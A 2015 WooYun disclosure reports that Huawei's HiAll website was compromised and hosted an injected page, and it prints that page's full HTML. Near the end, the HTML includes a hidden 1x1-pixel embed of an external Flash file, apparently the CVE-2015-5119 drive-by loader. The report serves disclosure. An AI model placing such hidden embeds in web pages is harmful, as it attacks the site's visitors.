当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132228

漏洞标题:华为HiAll网站已被入侵插入恶意代码危害用户安全

相关厂商:华为技术有限公司

漏洞作者: 旧时人 °

提交时间:2015-08-07 11:05

修复时间:2015-09-21 18:26

公开时间:2015-09-21 18:26

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

HiAll又名:北京纽哈斯国际教育咨询有限公司
北京纽哈斯国际教育咨询公司(New House International Education Consulting Co.,Ltd.)是一家致力于与职业生涯相关的教育咨询培训国际化企业·其前身为2001年成立于美国芝加哥的非营利组织HiAll团队,现任股东及管理者均为具有教育培训经验的国内外专家。

详细说明:

华为HiAll网站已被入侵插入恶意代码危害用户安全。
华为HiAll地址:http://huawei.hiall.com.cn/

漏洞证明:

华为HiAll地址:http://huawei.hiall.com.cn/
恶意代码地址:http://huawei.hiall.com.cn/xunyi/liuge.html
访问提示CVE-2015-5119漏洞

360截图20150806215222945.jpg


360截图20150806215341888.jpg


下面是黑页所有代码

<p>
<span style="color:#00D5FF;"></span>
</p>
<div style="text-align:center;">
<br />
</div>
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><em>it's been a long day without you my friend.</em></span>
</div>
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><em>&nbsp;and i'll tell you all about it when i see you again.</em></span>
</div>
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><em>we've come a long way from where we began.</em></span>
</div>
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><em>oh i'll tell you all about it when i see you again.</em></span>
</div>
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><em>when i see you again~</em></span>
</div>
<div style="text-align:center;">
<br />
</div>
<span style="font-size:16px;"><strong></strong></span><br />
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><strong>留歌</strong></span>
</div>
<br />
<br />
<div style="text-align:center;">
<span style="line-height:1.5;color:#009900;font-size:24px;"><strong>我问佛:如何才能如你般睿智? 佛曰:佛是过来人,人是未来佛 我也曾如你般天真</strong></span>
</div>
<strong></strong><br />
<div style="text-align:center;">
<span style="line-height:1.5;color:#4C33E5;font-size:16px;">================================================================</span>
</div>
<s></s>
<p>
<span style="font-size:16px;">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span>
</p>
<div style="text-align:center;">

</div>
<p style="text-align:center;">
<img src="http://kindeditor.net/ke4/plugins/emoticons/images/28.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/6.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/44.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/13.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/52.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/30.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/25.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/3.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/49.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/0.gif" border="0" alt="" /><img src="http://kindeditor.net/ke4/plugins/emoticons/images/39.gif" border="0" alt="" />
</p>
<p style="text-align:center;">
<br />
</p>
<p style="text-align:center;">
<span style="color:#00D5FF;font-size:18px;line-height:1.5;font-family:'Microsoft YaHei', 'Courier New', Courier;">一花一世界,一念一轮回</span>
</p>
<p style="text-align:center;">
<span style="color:#00D5FF;font-size:18px;line-height:1.5;font-family:'Microsoft YaHei', 'Courier New', Courier;"><br />
</span>
</p>
<p style="text-align:center;">
<span style="font-size:18px;color:#00D5FF;">那是不是你认识一个女孩从开始到结束的过程</span>
</p>
<p style="text-align:center;">
<span style="font-size:16px;color:#00D5FF;"><span style="font-size:16px;"></span><br />
</span>
</p>
<p style="text-align:center;">
<span style="color:#4C33E5;font-size:16px;">================================xunyi3389.blog.163.com================================</span><span style="color:#4C33E5;"></span>
</p>
<p style="text-align:center;">
<span style="color:#4C33E5;font-size:16px;"><embed width="" height="" /><br />
</span>
</p>
<p style="text-align:center;">
<span style="color:#4C33E5;"><br />
</span>
</p>
<p>
<span style="color:#009900;"></span>
</p>
<audio controls="controls" hidden="hidden" autoplay="autoplay" loop="loop">
<source src="http://qzone.haoduoge.com/music1/2015-04-20/1429468444.mp3" type="audio/mpeg" />
</audio>
<body background="http://sh-btfs.yun.ftn.qq.com/ftn_handler/c14f4e55b75a919fcb0520b6a355bd548552ce2e4b180740c4fa9b37d5649c9b/?fname=123.jpg&cn=0&cv=30013">
<embed src="http://ndsjc.imu.edu.cn/content/flash.swf" width="1" height="1"></embed>

修复方案:

删除

版权声明:转载请注明来源 旧时人 °@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-07 18:25

厂商回复:

非常感谢白帽子对华为公司IT安全的关注,我们已通知问题站点运维人员处理该问题。

最新状态:

暂无